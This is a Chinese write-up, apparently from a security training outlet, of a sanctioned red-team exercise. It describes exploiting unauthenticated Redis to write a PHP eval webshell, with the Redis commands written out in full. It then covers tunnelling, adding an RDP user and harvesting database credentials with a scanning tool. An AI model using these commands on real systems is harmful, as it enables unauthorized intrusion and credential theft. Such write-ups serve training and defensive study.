攻防演练 | redis艰难写shell进入内网

扫码领资料

获网安教程

本文由掌控安全学院 - 没勇气先生 投稿

背景

某地市级攻防演练

要求

拿到指定单位的靶标系统（必须是web后台管理权限+数据库+服务器）

正式开始

redis未授权

首先通过信息收集获取到了一些IP，且发现一个IP中存在redis未授权。

此时兴冲冲的去尝试写入定时任务反弹shell，主从复制，写入私钥，结果都以失败告终。。。
小tips：一般fscan会检测是否可以写入定时任务，如果有就直接定时任务弹shell，百试百灵！（下图这种就是能写计划任务的）

获取绝对路径

以上手段尝试无果后，尝试在该IP开放的web服务中扫描目录，结果扫到了一个phpinfo页面！且phpinfo中泄漏了站点的绝对路径！这不就柳暗花明又一村了吗！决定直接在redis里写webshell咯！嘿嘿！

就在我一脸兴奋的
config set dir E:/WSPHP/PHPWS/
config set dbfilename redis.php
set webshell "<?php eval($_POST['zkaq']);?>"
save
之时，数据库给我返回一个

瞬间头大了！！！

更改只读权限

秉持着遇事不决，便问百度的原则，我查到了两个办法

方法一需要服务器权限，且需要重启服务，很显然咱们不具备这个条件，也没这个胆量，怕重启起不来人就傻了，只能用方法二尝试一下了，结果还真的可以了！

写入webshell

更改好权限，又有绝对路径后，终于可以愉快的写shell了，结果在连上的一瞬间，看见站点的根目录下已经存在很多webshell文件了，果然在每一个你所向往的林荫小路中，其实早已车水马龙，不过幸好目标单位还没下线，还可以再吃点分！

获取服务器权限

拿到webshell可以执行命令后，自然就是风哥教我的搭建隧道，创建用户一条龙了！
成功登录RDP后，就获取到了服务器权限，成功了三分之一了！加油！

获取数据库权限

获取到服务器权限后，扔进去一个searchall跑了一下，获取到了数据库凭证！并成功获取了数据库权限！成功了三分之二了！
（searchall还是很好用的，项目地址在这里  https://github.com/Naturehi666/searchall )

web权限

随后在服务器中装了一个绿色版everthing成功找到了靶标系统的源码，且在数据库中找到其登录凭证后，以为马上就要吃到靶标分时，结果在外网死活找不到他的资产了！最终在服务器中源码的js文件中找到一个唯一值，并在资产测绘中搜索该唯一值，好消息是找到了！坏消息是关站了！！没得办法，只能在内网中截了一张图，去跟裁判battle了。

至此，对要求的靶标系统的服务器、数据库、后台已经完全获取到！有什么不足的地方，欢迎大家互相指出！

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，
所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

没看够~？欢迎关注！
分享本文到朋友圈，可以凭截图找老师领取
上千教程+工具+靶场账号哦
原文始发于微信公众号（掌控安全EDU）：攻防演练 | redis艰难写shell进入内网